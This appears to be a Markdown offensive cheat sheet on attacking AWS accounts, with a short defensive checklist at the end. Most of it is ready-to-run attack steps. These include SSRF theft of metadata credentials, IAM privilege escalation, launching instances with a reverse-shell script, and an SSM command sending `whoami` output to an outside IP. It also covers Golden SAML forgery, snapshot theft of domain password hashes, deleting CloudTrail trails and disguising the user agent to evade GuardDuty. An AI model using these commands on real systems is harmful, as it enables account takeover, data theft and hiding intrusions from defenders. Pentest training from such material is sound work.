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611 lines
34 KiB
Markdown
611 lines
34 KiB
Markdown
# AWS
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> Amazon Web Services offers reliable, scalable, and inexpensive cloud computing services.
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## Summary
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* [Training](#training)
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* [Tools](#tools)
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* [AWS - Patterns](#aws---patterns)
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* [AWS - Metadata SSRF](#aws---metadata-ssrf)
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* [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2)
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* [Method for Container Service (Fargate)](#method-for-container-service-fargate)
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* [AWS - Shadow Admin](#aws---shadow-admin)
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* [Admin equivalent permission](#admin-equivalent-permission)
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* [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys)
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* [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
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* [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
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* [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
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* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
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* [AWS - SSM - Command execution](#aws---ssm---command-execution)
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* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
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* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack)
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* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
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* [PenTest:IAMUser/KaliLinux](#)
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* [PenTest:IAMUser/ParrotLinux](#)
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* [PenTest:IAMUser/PentooLinux](#)
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* [Security checks](#security-checks)
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* [References](#references)
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## Training
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* Damn Vulnerable Cloud Application - https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6
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* SadCloud - https://github.com/nccgroup/sadcloud
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* Flaws - http://flaws.cloud
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## Tools
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* **SkyArk** - Discover the most privileged users in the scanned AWS environment - including the AWS Shadow Admins.
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Require:
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- Read-Only permissions over IAM service
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```powershell
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$ git clone https://github.com/cyberark/SkyArk
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$ powershell -ExecutionPolicy Bypass -NoProfile
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PS C> Import-Module .\SkyArk.ps1 -force
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PS C> Start-AWStealth
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or in the Cloud Console
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PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AWStealth/AWStealth.ps1')
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PS C> Scan-AWShadowAdmins
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```
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* **Pacu** - Pacu allows penetration testers to exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set.
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Require:
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- AWS Keys
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```powershell
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$ git clone https://github.com/RhinoSecurityLabs/pacu
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$ bash install.sh
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$ python3 pacu.py
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set_keys/swap_keys
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ls
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run <module_name> [--keyword-arguments]
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run <module_name> --regions eu-west-1,us-west-1
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# https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details
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```
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* **Prowler** : AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100).
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Require:
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- arn:aws:iam::aws:policy/SecurityAudit
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```powershell
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$ pip install awscli ansi2html detect-secrets
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$ git clone https://github.com/toniblyx/prowler
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$ sudo apt install jq
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$ ./prowler -E check42,check43
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$ ./prowler -p custom-profile -r us-east-1 -c check11
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$ ./prowler -A 123456789012 -R ProwlerRole # sts assume-role
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```
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* **Principal Mapper** : A tool for quickly evaluating IAM permissions in AWS
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```powershell
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https://github.com/nccgroup/PMapper
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pip install principalmapper
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pmapper graph --create
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pmapper visualize --filetype png
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pmapper analysis --output-type text
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# Determine if PowerUser can escalate privileges
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pmapper query "preset privesc user/PowerUser"
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pmapper argquery --principal user/PowerUser --preset privesc
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# Find all principals that can escalate privileges
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pmapper query "preset privesc *"
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pmapper argquery --principal '*' --preset privesc
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# Find all principals that PowerUser can access
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pmapper query "preset connected user/PowerUser *"
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pmapper argquery --principal user/PowerUser --resource '*' --preset connected
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# Find all principals that can access PowerUser
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pmapper query "preset connected * user/PowerUser"
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pmapper argquery --principal '*' --resource user/PowerUser --preset connected
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```
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* **ScoutSuite** : https://github.com/nccgroup/ScoutSuite/wiki
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```powershell
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$ git clone https://github.com/nccgroup/ScoutSuite
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$ python scout.py PROVIDER --help
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# The --session-token is optional and only used for temporary credentials (i.e. role assumption).
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$ python scout.py aws --access-keys --access-key-id <AKIAIOSFODNN7EXAMPLE> --secret-access-key <wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY> --session-token <token>
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$ python scout.py azure --cli
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```
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* **weirdAAL** : AWS Attack Library https://github.com/carnal0wnage/weirdAAL/wiki
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```powershell
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python3 weirdAAL.py -m ec2_describe_instances -t demo
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python3 weirdAAL.py -m lambda_get_account_settings -t demo
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python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2' -t yolo
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```
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* **cloudmapper** : CloudMapper helps you analyze your Amazon Web Services (AWS) environments.
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```powershell
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git clone https://github.com/duo-labs/cloudmapper.git
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# sudo yum install autoconf automake libtool python3-devel.x86_64 python3-tkinter python-pip jq awscli
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# You may additionally need "build-essential"
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sudo apt-get install autoconf automake libtool python3.7-dev python3-tk jq awscli
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pipenv install --skip-lock
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pipenv shell
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report: Generate HTML report. Includes summary of the accounts and audit findings.
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iam_report: Generate HTML report for the IAM information of an account.
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audit: Check for potential misconfigurations.
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collect: Collect metadata about an account.
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find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges
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```
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## AWS Patterns
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| Service | URL |
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|-------------|--------|
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| s3 | https://{user_provided}.s3.amazonaws.com |
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| cloudfront | https://{random_id}.cloudfront.net |
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| ec2 | ec2-{ip-seperated}.compute-1.amazonaws.com |
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| es | https://{user_provided}-{random_id}.{region}.es.amazonaws.com |
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| elb | http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 |
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| elbv2 | https://{user_provided}-{random_id}.{region}.elb.amazonaws.com |
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| rds | mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 |
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| rds | postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 |
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| route 53 | {user_provided} |
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| execute-api | https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} |
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| cloudsearch | https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com |
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| transfer | sftp://s-{random_id}.server.transfer.{region}.amazonaws.com |
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| iot | mqtt://{random_id}.iot.{region}.amazonaws.com:8883 |
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| iot | https://{random_id}.iot.{region}.amazonaws.com:8443 |
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| iot | https://{random_id}.iot.{region}.amazonaws.com:443 |
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| mq | https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162 |
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| mq | ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 |
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| kafka | b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com |
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| kafka | {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com |
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| cloud9 | https://{random_id}.vfs.cloud9.{region}.amazonaws.com |
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| mediastore | https://{random_id}.data.mediastore.{region}.amazonaws.com |
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| kinesisvideo | https://{random_id}.kinesisvideo.{region}.amazonaws.com |
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| mediaconvert | https://{random_id}.mediaconvert.{region}.amazonaws.com |
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| mediapackage | https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel |
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## AWS - Metadata SSRF
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> AWS released an additional security defences against the attack.
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:warning: Only working with IMDSv1.
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Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required`.
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In order to usr IMDSv2 you must provide a token.
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```powershell
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export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
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curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"
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```
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### Method for Elastic Cloud Compute (EC2)
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Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
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1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/
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```powershell
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ami-id
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ami-launch-index
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ami-manifest-path
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block-device-mapping/
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events/
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hostname
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iam/
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identity-credentials/
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instance-action
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instance-id
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```
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2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/
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3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
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```powershell
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{
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"Code" : "Success",
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"LastUpdated" : "2019-07-31T23:08:10Z",
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"Type" : "AWS-HMAC",
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"AccessKeyId" : "ASIA54BL6PJR37YOEP67",
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"SecretAccessKey" : "OiAjgcjm1oi2xxxxxxxxOEXkhOMhCOtJMP2",
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"Token" : "AgoJb3JpZ2luX2VjEDU86Rcfd/34E4rtgk8iKuTqwrRfOppiMnv",
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"Expiration" : "2019-08-01T05:20:30Z"
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}
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```
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### Method for Container Service (Fargate)
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1. Fetch the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable from https://awesomeapp.com/download?file=/proc/self/environ
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```powershell
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JAVA_ALPINE_VERSION=8.212.04-r0
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HOSTNAME=bbb3c57a0ed3SHLVL=1PORT=8443HOME=/root
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AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447
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AWS_EXECUTION_ENV=AWS_ECS_FARGATEMVN_VER=3.3.9JAVA_VERSION=8u212AWS_DEFAULT_REGION=us-west-2
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ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb4f6285-48f2-4a51-a787-67dbe61c13ffPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin:/usr/lib/mvn:/usr/lib/mvn/binLANG=C.UTF-8AWS_REGION=us-west-2Tag=48111bbJAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jreM2=/usr/lib/mvn/binPWD=/appM2_HOME=/usr/lib/mvnLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjd
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```
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2. Use the credential URL to dump the AccessKey and SecretKey : https://awesomeapp.com/forward?target=http://169.254.170.2/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447
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```powershell
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{
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"RoleArn": "arn:aws:iam::953574914659:role/awesome-waf-role",
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"AccessKeyId": "ASIA54BL6PJR2L75XHVS",
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"SecretAccessKey": "j72eTy+WHgIbO6zpe2DnfjEhbObuTBKcemfrIygt",
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"Token": "FQoGZXIvYXdzEMj//////////wEaDEQW+wwBtaoyqH5lNSLGBF3PnwnLYa3ggfKBtLMoWCEyYklw6YX85koqNwKMYrP6ymcjv4X2gF5enPi9/Dx6m/1TTFIwMzZ3tf4V3rWP3HDt1ea6oygzTrWLvfdp57sKj+2ccXI+WWPDZh3eJr4Wt4JkiiXrWANn7Bx3BUj9ZM11RXrKRCvhrxdrMLoewRkWmErNEOFgbaCaT8WeOkzqli4f+Q36ZerT2V+FJ4SWDX1CBsimnDAMAdTIRSLFxVBBwW8171OHiBOYAMK2np1xAW1d3UCcZcGKKZTjBee2zs5+Rf5Nfkoq+j7GQkmD2PwCeAf0RFETB5EVePNtlBWpzfOOVBtsTUTFewFfx5cyNsitD3C2N93WR59LX/rNxyncHGDUP/6UPlasOcfzAaG738OJQmWfQTR0qksHIc2qiPtkstnNndh76is+r+Jc4q3wOWu2U2UBi44Hj+OS2UTpMAwc/MshIiGsUOrBQdPqcLLdAxKpUNTdSQNLg5wv4f2OrOI8/sneV58yBRolBz8DZoH8wohtLXpueDt8jsVSVLznnMOOe/4ehHE2Nt+Fy+tjaY5FUi/Ijdd5IrIdIvWFHY1XcPopUFYrDqr0yuZvX1YddfIcfdbmxf274v69FuuywXTo7cXk1QTMYZWlD/dPI/k6KQeO446UrHT9BJxcJMpchAIVRpI7nVKkSDwku1joKUG7DOeycuAbhecVZG825TocL0ks2yXPnIdvckAaU9DZf+afIV3Nxv3TI4sSX1npBhb2f/8C31pv8VHyu2NiN5V6OOHzZijHsYXsBQ==",
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"Expiration": "2019-09-18T04:05:59Z"
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}
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```
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## AWS - Shadow Admin
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### Admin equivalent permission
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- AdministratorAccess
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```powershell
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"Action": "*"
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"Resource": "*"
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```
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- ec2:AssociateIamInstanceProfile
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- **iam:CreateAccessKey**iam:CreateAccessKey : create a new access key to another IAM admin account
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```powershell
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aws iam create-access-key –user-name target_user
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```
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- **iam:CreateLoginProfile** : add a new password-based login profile, set a new password for an entity and impersonate it
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```powershell
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$ aws iam create-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required
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```
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- **iam:UpdateLoginProfile** : reset other IAM users’ login passwords.
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```powershell
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$ aws iam update-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required
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```
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- **iam:AttachUserPolicy**, **iam:AttachGroupPolicy** or **iam:AttachRolePolicy** : attach existing admin policy to any other entity he currently possesses
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```powershell
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$ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess
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$ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess
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$ aws iam attach-role-policy –role-name role_i_can_assume –policy-arn arn:aws:iam::aws:policy/AdministratorAccess
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```
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- **iam:PutUserPolicy**, **iam:PutGroupPolicy** or **iam:PutRolePolicy** : added inline policy will allow the attacker to grant additional privileges to previously compromised entities.
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```powershell
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$ aws iam put-user-policy –user-name my_username –policy-name my_inline_policy –policy-document file://path/to/administrator/policy.json
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```
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- **iam:CreatePolicy** : add a stealthy admin policy
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- **iam:AddUserToGroup** : add into the admin group of the organization.
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```powershell
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$ aws iam add-user-to-group –group-name target_group –user-name my_username
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```
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- **iam:UpdateAssumeRolePolicy** + **sts:AssumeRole** : change the assuming permissions of a privileged role and then assume it with a non-privileged account.
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```powershell
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$ aws iam update-assume-role-policy –role-name role_i_can_assume –policy-document file://path/to/assume/role/policy.json
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```
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- **iam:CreatePolicyVersion** & **iam:SetDefaultPolicyVersion** : change customer-managed policies and change a non-privileged entity to be a privileged one.
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```powershell
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$ aws iam create-policy-version –policy-arn target_policy_arn –policy-document file://path/to/administrator/policy.json –set-as-default
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$ aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
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```
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- **lambda:UpdateFunctionCode** : give an attacker access to the privileges associated with the Lambda service role that is attached to that function.
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```powershell
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$ aws lambda update-function-code –function-name target_function –zip-file fileb://my/lambda/code/zipped.zip
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```
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- **glue:UpdateDevEndpoint** : give an attacker access to the privileges associated with the role attached to the specific Glue development endpoint.
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```powershell
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$ aws glue –endpoint-name target_endpoint –public-key file://path/to/my/public/ssh/key.pub
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```
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- **iam:PassRole** + **ec2:CreateInstanceProfile**/**ec2:AddRoleToInstanceProfile** : an attacker could create a new privileged instance profile and attach it to a compromised EC2 instance that he possesses.
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- **iam:PassRole** + **ec2:RunInstance** : give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account.
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```powershell
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# add ssh key
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$ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –key-name my_ssh_key –security-group-ids sg-123456
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# execute a reverse shell
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$ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –user-data file://script/with/reverse/shell.sh
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```
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- **iam:PassRole** + **lambda:CreateFunction** + **lambda:InvokeFunction** : give a user access to the privileges associated with any Lambda service role that exists in the account.
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```powershell
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$ aws lambda create-function –function-name my_function –runtime python3.6 –role arn_of_lambda_role –handler lambda_function.lambda_handler –code file://my/python/code.py
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$ aws lambda invoke –function-name my_function output.txt
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```
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Example of code.py
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```python
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import boto3
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def lambda_handler(event, context):
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client = boto3.client('iam')
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response = client.attach_user_policy(
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UserName='my_username',
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PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
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)
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return response
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```
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* **iam:PassRole** + **glue:CreateDevEndpoint** : access to the privileges associated with any Glue service role that exists in the account.
|
||
```powershell
|
||
$ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub
|
||
```
|
||
|
||
## AWS - Gaining AWS Console Access via API Keys
|
||
|
||
A utility to convert your AWS CLI credentials into AWS console access.
|
||
|
||
```powershell
|
||
$> git clone https://github.com/NetSPI/aws_consoler
|
||
$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED]
|
||
2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments...
|
||
2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic.
|
||
2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established.
|
||
2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session.
|
||
2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established.
|
||
2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler.
|
||
2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated!
|
||
https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED
|
||
```
|
||
|
||
## AWS - Mount EBS volume to EC2 Linux
|
||
|
||
:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken.
|
||
|
||
Step 1: Head over to EC2 –> Volumes and create a new volume of your preferred size and type.
|
||
Step 2: Select the created volume, right click and select the "attach volume" option.
|
||
Step 3: Select the instance from the instance text box as shown below : `attach ebs volume`
|
||
```powershell
|
||
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
|
||
aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device
|
||
```
|
||
|
||
Step 4: Now, login to your ec2 instance and list the available disks using the following command : `lsblk`
|
||
Step 5: Check if the volume has any data using the following command : `sudo file -s /dev/xvdf`
|
||
Step 6: Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf`
|
||
Step 7: Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume`
|
||
Step 8: Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/`
|
||
Step 9: cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .`
|
||
|
||
|
||
## AWS - Copy EC2 using AMI Image
|
||
|
||
First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1`
|
||
|
||
```powershell
|
||
# create a new image for the instance-id
|
||
$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1
|
||
|
||
# add key to AWS
|
||
$ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1
|
||
|
||
# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.
|
||
$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1
|
||
|
||
# now you can check the instance
|
||
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1
|
||
|
||
# If needed : edit groups
|
||
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1
|
||
|
||
# be a good guy, clean our instance to avoid any useless cost
|
||
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
|
||
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
|
||
```
|
||
|
||
## AWS - Instance Connect - Push an SSH key to EC2 instance
|
||
|
||
```powershell
|
||
# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/
|
||
$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"
|
||
$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds
|
||
```
|
||
|
||
## AWS - Lambda - Extract function's code
|
||
|
||
```powershell
|
||
# https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed
|
||
$ aws lambda list-functions --profile uploadcreds
|
||
$ aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
|
||
$ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
|
||
```
|
||
|
||
## AWS - SSM - Command execution
|
||
|
||
:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
|
||
|
||
SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
|
||
* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
|
||
* Windows Server 2016 and 2019
|
||
* Amazon Linux
|
||
* Amazon Linux 2
|
||
* Ubuntu Server 16.04
|
||
* Ubuntu Server 18.04
|
||
* Amazon ECS-Optimized
|
||
|
||
```powershell
|
||
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
|
||
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
|
||
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
|
||
|
||
e.g:
|
||
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
|
||
```
|
||
|
||
## AWS - Golden SAML Attack
|
||
|
||
https://www.youtube.com/watch?v=5dj4vOqqGZw
|
||
https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/
|
||
|
||
> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user's password. This attack also bypasses any MFA requirements.
|
||
|
||
Requirement:
|
||
* Token-signing private key (export from personnal store using Mimikatz)
|
||
* IdP public certificate
|
||
* IdP name
|
||
* Role name (role to assume)
|
||
|
||
```powershell
|
||
$ python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
|
||
$ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
|
||
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
|
||
```
|
||
|
||
## AWS - Shadow Copy attack
|
||
|
||
Prerequisite:
|
||
* EC2:CreateSnapshot
|
||
* CloudCopy - https://github.com/Static-Flow/CloudCopy
|
||
|
||
1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions
|
||
2. Run `"Describe-Instances"` and show in list for attacker to select
|
||
3. Run `"Create-Snapshot"` on volume of selected instance
|
||
4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account
|
||
5. Load AWS CLI with Attacker Credentials
|
||
6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot
|
||
7. Ssh run `"sudo mkdir /windows"`
|
||
8. Ssh run `"sudo mount /dev/xvdf1 /windows/"`
|
||
9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"`
|
||
10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"`
|
||
11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"`
|
||
12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"`
|
||
13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
|
||
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
||
|
||
|
||
## Disable CloudTrail
|
||
|
||
```powershell
|
||
$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
|
||
```
|
||
|
||
Disable monitoring of events from global services
|
||
|
||
```powershell
|
||
$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
|
||
```
|
||
|
||
Disable Cloud Trail on specific regions
|
||
|
||
```powershell
|
||
$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
|
||
```
|
||
|
||
|
||
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
|
||
|
||
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
|
||
|
||
Pacu bypass this problem by defining a custom User-agent (https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473)
|
||
|
||
```python
|
||
boto3_session = boto3.session.Session()
|
||
ua = boto3_session._session.user_agent()
|
||
if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # If the local OS is Kali/Parrot/Pentoo Linux
|
||
# GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that...
|
||
self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...')
|
||
```
|
||
|
||
### PenTest:IAMUser/KaliLinux
|
||
|
||
#### Finding description
|
||
|
||
**An API was invoked from a Kali Linux EC2 instance\.**
|
||
|
||
This finding informs you that a machine running Kali Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Kali Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\.
|
||
|
||
#### Default severity: Medium
|
||
|
||
### PenTest:IAMUser/ParrotLinux
|
||
|
||
#### Finding description
|
||
|
||
**An API was invoked from a Parrot Security Linux EC2 instance\.**
|
||
|
||
This finding informs you that a machine running Parrot Security Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Parrot Security Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\.
|
||
|
||
#### Default severity: Medium
|
||
|
||
### PenTest:IAMUser/PentooLinux
|
||
|
||
#### Finding description
|
||
|
||
**An API was invoked from a Pentoo Linux EC2 instance\.**
|
||
|
||
This finding informs you that a machine running Pentoo Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Pentoo Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\.
|
||
|
||
#### Default severity: Medium<a name="pentest3_severity"></a>
|
||
|
||
|
||
## Security checks
|
||
|
||
https://github.com/DenizParlak/Zeus
|
||
|
||
* Identity and Access Management
|
||
* Avoid the use of the "root" account
|
||
* Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password
|
||
* Ensure credentials unused for 90 days or greater are disabled
|
||
* Ensure access keys are rotated every 90 days or less
|
||
* Ensure IAM password policy requires at least one uppercase letter
|
||
* Ensure IAM password policy requires at least one lowercase letter
|
||
* Ensure IAM password policy requires at least one symbol
|
||
* Ensure IAM password policy requires at least one number
|
||
* Ensure IAM password policy requires minimum length of 14 or greater
|
||
* Ensure no root account access key exists
|
||
* Ensure MFA is enabled for the "root" account
|
||
* Ensure security questions are registered in the AWS account
|
||
* Ensure IAM policies are attached only to groups or role
|
||
* Enable detailed billing
|
||
* Maintain current contact details
|
||
* Ensure security contact information is registered
|
||
* Ensure IAM instance roles are used for AWS resource access from instances
|
||
* Logging
|
||
* Ensure CloudTrail is enabled in all regions
|
||
* Ensure CloudTrail log file validation is enabled
|
||
* Ensure the S3 bucket CloudTrail logs to is not publicly accessible
|
||
* Ensure CloudTrail trails are integrated with CloudWatch Logs
|
||
* Ensure AWS Config is enabled in all regions
|
||
* Ensure S3 bucket access logging is enabled on the CloudTrail S3 bucket
|
||
* Ensure CloudTrail logs are encrypted at rest using KMS CMKs
|
||
* Ensure rotation for customer created CMKs is enabled
|
||
* Networking
|
||
* Ensure no security groups allow ingress from 0.0.0.0/0 to port 22
|
||
* Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389
|
||
* Ensure VPC flow logging is enabled in all VPC
|
||
* Ensure the default security group of every VPC restricts all traffic
|
||
* Monitoring
|
||
* Ensure a log metric filter and alarm exist for unauthorized API calls
|
||
* Ensure a log metric filter and alarm exist for Management Consolesign-in without MFA
|
||
